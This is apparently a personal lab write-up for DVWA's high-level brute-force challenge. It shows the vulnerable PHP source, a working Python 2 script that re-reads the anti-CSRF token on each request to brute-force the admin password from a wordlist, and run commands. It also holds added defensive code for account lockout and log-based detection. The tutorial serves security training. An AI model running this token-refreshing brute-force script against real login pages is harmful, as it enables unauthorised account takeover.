Anggi's Notes
High

Brute Force level High on DVWA

Below is the source code of the DVWA login form at level high.

vulnerabilities/brute/source/high.php

<?php

if( isset( $_GET[ 'Login' ] ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // Sanitise username input
    $user = $_GET[ 'username' ];
    $user = stripslashes( $user );
    $user = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $user ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));

    // Sanitise password input
    $pass = $_GET[ 'password' ];
    $pass = stripslashes( $pass );
    $pass = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    $pass = md5( $pass );

    // Check database
    $query  = "SELECT * FROM `users` WHERE user = '$user' AND password = '$pass';";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

    if( $result && mysqli_num_rows( $result ) == 1 ) {
        // Get users details
        $row    = mysqli_fetch_assoc( $result );
        $avatar = $row["avatar"];

        // Login successful
        echo "<p>Welcome to the password protected area {$user}</p>";
        echo "<img src=\"{$avatar}\" />";
    }
    else {
        // Login failed
        sleep( rand( 0, 3 ) );
        echo "<pre><br />Username and/or password incorrect.</pre>";
    }

    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}

// Generate Anti-CSRF token
generateSessionToken();

?>

Gathering Information

At the high level, the server validates the Anti-CSRF token first, and every failed login is followed by a delay of 0-3 seconds.

In short, an Anti-CSRF token is a unique token (its value changes with every new request) used to make sure that the request was genuinely issued by the user.

If we inspect the element, we can see a hidden input tag named user_token together with its value.

The value of that token changes every time we make a new request (just refresh the page; the value will be different).

If we force the same value to be reused, the request fails and the page redirects back to the login form.
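As an added illustration, not DVWA's code and not from the original page: a Python sketch of the control the high level lacks, a single-use token combined with a per-account lockout, replayed against the tutorial's own loop of fetching a fresh token and trying the next guess. The user store, password and timings are constructed for the example.

```python
import hashlib
import hmac
import secrets
from datetime import datetime, timedelta

# Constructed user store, not DVWA's database; unsalted SHA-256 is used for brevity,
# a real store would use a password KDF such as scrypt or argon2.
USERS = {"admin": hashlib.sha256(b"correct-horse").hexdigest()}

class LoginGuard:
    """Single-use anti-CSRF tokens plus per-account lockout, the control the high level lacks."""

    def __init__(self, max_failures=3, lockout=timedelta(minutes=15)):
        self.max_failures = max_failures
        self.lockout = lockout
        self.failures = {}   # user -> (failed attempt count, time of last failure)
        self.tokens = set()  # tokens issued with the form, consumed on first use

    def issue_token(self):
        tok = secrets.token_hex(16)
        self.tokens.add(tok)
        return tok

    def is_locked(self, user, now):
        count, last = self.failures.get(user, (0, None))
        return count >= self.max_failures and now - last < self.lockout

    def login(self, user, password, token, now):
        if token not in self.tokens:      # replayed or forged token: reject, as DVWA does
            return "bad_token"
        self.tokens.discard(token)        # consumed whether or not the password is right
        if self.is_locked(user, now):     # a correct password is refused while locked
            return "locked"
        digest = hashlib.sha256(password.encode()).hexdigest()
        if user in USERS and hmac.compare_digest(digest, USERS[user]):
            self.failures.pop(user, None)
            return "ok"
        count, _ = self.failures.get(user, (0, None))
        self.failures[user] = (count + 1, now)
        return "failed"

def simulate(guard, wordlist, user="admin", start=datetime(2023, 5, 10, 10, 0, 0)):
    """Replay the tutorial's loop (fresh token, next guess) with attempts two seconds apart."""
    outcomes = []
    for i, guess in enumerate(wordlist):
        now = start + timedelta(seconds=2 * i)
        outcomes.append(guard.login(user, guess, guard.issue_token(), now))
    return outcomes
```

A rotating token only forces the client to fetch it again, as the script below does; the lockout is what stops the fourth guess even when it is correct. Per-account lockout can itself be abused to lock legitimate users out, so pair it with per-client rate limiting and alerting.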

To deal with this we can no longer use Hydra, because it cannot handle an Anti-CSRF token that keeps changing. Instead, we will brute force with a script of our own written in Python.

nano bruteforce.py

Write the following script:

from sys import argv
import requests
from BeautifulSoup import BeautifulSoup as Soup

# give our arguments more semantic friendly names
script, filename, success_message = argv

# set up our target, cookie and session
url = 'http://172.17.0.2/vulnerabilities/brute/index.php'
cookie = {'security': 'high', 'PHPSESSID': '77jr5376ldag1qc392brdr2b11'}
s = requests.Session()
target_page = s.get(url, cookies=cookie)


def checkSuccess(html):
    '''
    checkSuccess
    @param: html (String)

    Searches the response HTML for our specified success message
    '''
    # get our soup ready for searching
    soup = Soup(html)
    # check for our success message in the soup
    search = soup.findAll(text=success_message)
    # return the brute force result
    return bool(search)


# Get the initial CSRF token from the target site
page_source = target_page.text
soup = Soup(page_source)
csrf_token = soup.findAll(attrs={"name": "user_token"})[0].get('value')

# Display before attack
print 'DVWA URL=' + url
print 'CSRF Token=' + csrf_token

# Loop through our provided password file
success = False
with open(filename) as f:
    print 'Running brute force attack...'
    for password in f:
        # strip whitespace from the password list entry and display the try
        password = password.strip()
        print 'password tried: ' + password

        # setup the payload
        payload = {'username': 'admin', 'password': password, 'Login': 'Login', 'user_token': csrf_token}
        r = s.get(url, cookies=cookie, params=payload)
        success = checkSuccess(r.text)

        if not success:
            # if it failed the CSRF token will be changed. Get the new one
            soup = Soup(r.text)
            csrf_token = soup.findAll(attrs={"name": "user_token"})[0].get('value')
        else:
            # Success! Show the result
            print 'Password is: ' + password
            break

# We failed, bummer.
if not success:
    print 'Brute force failed. No matches found.'

Performing the Attack

First, prepare the script as shown above.

The script uses Python 2. Before running it, make sure its dependencies are installed.

sudo pip install requests
sudo pip install beautifulsoup

To run the script we need two parameters: the wordlist filename and the success message used to decide whether a login succeeded, like so:

python2.7 bruteforce.py DVWA-Wordlist.txt "Welcome to the password protected area admin"

If it succeeds, the valid password is printed, as in the image above.
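From the defender's side, an added example (not part of the original page) that spots this attack pattern in the web server's access log: constructed Apache combined-format lines for the DVWA brute page, counted per client and username inside a sliding window. Because the form submits with GET, the guessed passwords themselves land in the log, which matters before such logs are shared.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import urlparse, parse_qs

# Constructed Apache lines for the DVWA brute page (not captured traffic); note the passwords in the URLs.
SAMPLE_LOG = """\
172.17.0.1 - - [10/May/2023:10:00:01 +0000] "GET /vulnerabilities/brute/index.php?username=admin&password=123456&Login=Login&user_token=a1 HTTP/1.1" 200 1530
172.17.0.1 - - [10/May/2023:10:00:03 +0000] "GET /vulnerabilities/brute/index.php?username=admin&password=letmein&Login=Login&user_token=b2 HTTP/1.1" 200 1530
172.17.0.1 - - [10/May/2023:10:00:04 +0000] "GET /vulnerabilities/brute/index.php?username=admin&password=qwerty&Login=Login&user_token=c3 HTTP/1.1" 200 1530
172.17.0.1 - - [10/May/2023:10:00:06 +0000] "GET /vulnerabilities/brute/index.php?username=admin&password=password&Login=Login&user_token=d4 HTTP/1.1" 200 1601
10.0.0.5 - - [10/May/2023:10:00:07 +0000] "GET /vulnerabilities/brute/index.php?username=gordonb&password=abc123&Login=Login&user_token=e5 HTTP/1.1" 200 1601
10.0.0.5 - - [10/May/2023:10:00:09 +0000] "GET /vulnerabilities/brute/index.php HTTP/1.1" 200 1420
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \d+'
)
LOGIN_PATH = "/vulnerabilities/brute/index.php"

def parse_attempt(line):
    """Return (ip, timestamp, username, password_in_url) for a DVWA login attempt, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    url = urlparse(m.group("target"))
    qs = parse_qs(url.query)
    if url.path != LOGIN_PATH or "Login" not in qs:   # plain GET of the form is not an attempt
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return m.group("ip"), ts, qs.get("username", [""])[0], "password" in qs

def find_bruteforce(log_text, threshold=3, window=timedelta(seconds=60)):
    """Flag (ip, username) pairs with at least `threshold` attempts inside a sliding window.
    DVWA answers 200 for success and failure alike, so the attempt rate is the signal."""
    attempts = defaultdict(list)
    for line in log_text.splitlines():
        if a := parse_attempt(line):
            attempts[(a[0], a[2])].append(a[1])
    flagged = {}
    for key, times in attempts.items():
        times.sort()
        start = 0
        for end in range(len(times)):
            while times[end] - times[start] > window:   # drop attempts older than the window
                start += 1
            if end - start + 1 >= threshold:
                flagged[key] = max(flagged.get(key, 0), end - start + 1)
    return flagged
```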

Last updated 3 years ago

I got that script while reading the article .

Danny Beton